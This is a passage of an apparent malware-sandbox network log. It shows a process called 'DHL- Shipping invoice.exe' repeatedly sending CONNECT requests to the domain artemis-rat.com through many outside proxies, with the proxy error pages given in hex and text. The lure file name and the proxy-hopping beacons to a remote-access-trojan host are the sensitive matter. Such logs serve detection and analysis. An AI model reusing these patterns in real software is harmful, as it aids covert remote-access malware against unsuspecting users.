                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.335305929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.492238998 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            145192.168.2.45039245.138.87.23810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.337587118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            146192.168.2.450249118.218.126.5494006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.338040113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.624838114 CET1286INHTTP/1.1 403 Forbidden
                            Content-Type: text/html
                            Server: Zscaler/6.2
                            Cache-Control: no-cache
                            Access-Control-Allow-Origin: *
                            Content-length: 13596
                            Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            147192.168.2.450457104.17.66.69806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.346178055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.433737040 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            148192.168.2.45023720.37.207.880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.347913980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.752988100 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            149192.168.2.45041818.135.133.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.358305931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.807764053 CET65INHTTP/1.1 200 Connection Established
                            Content-Type: text/plain


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            150192.168.2.45042174.48.7.43806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.362936974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.529601097 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.25.3
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            151192.168.2.450410142.54.237.3441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.364901066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.843519926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            152192.168.2.45035514.103.24.2080006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.389833927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            153192.168.2.4503215.10.249.15910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.389868975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            154192.168.2.450352106.14.255.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.390002966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            155192.168.2.449770192.241.177.96105996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.390388012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562284946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.563091993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562797070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.563292027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.562308073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            156192.168.2.450252103.148.51.1980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.396167040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            157192.168.2.450309103.231.78.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.397784948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.736635923 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:19:52 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            158192.168.2.450473162.241.45.22570016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.404540062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.718496084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.046709061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.702873945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            159192.168.2.450320103.189.96.9880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.404946089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.124737024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.979386091 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            160192.168.2.450441162.214.102.195608916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.405159950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.874728918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.421627998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.514225960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.750140905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953634977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204545021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.597786903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.453912020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            161192.168.2.4504634.236.183.3780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.406142950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            162192.168.2.45025538.54.116.931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.406687975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
